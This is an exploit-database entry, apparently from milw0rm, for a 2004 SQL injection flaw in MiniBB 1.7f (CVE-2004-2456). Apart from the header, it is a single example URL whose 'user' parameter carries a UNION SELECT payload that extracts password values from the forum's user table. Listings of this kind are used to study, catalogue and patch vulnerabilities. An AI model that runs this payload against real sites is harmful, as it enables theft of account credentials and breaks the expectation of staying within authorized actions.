MiniBB 1.7f - 'user' SQL Injection

Related Vulnerabilities: CVE-2004-2456  
Publish Date: 16 Nov 2004
Author: anonymous
                							

                Example:

 http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* 

# milw0rm.com [2004-11-16]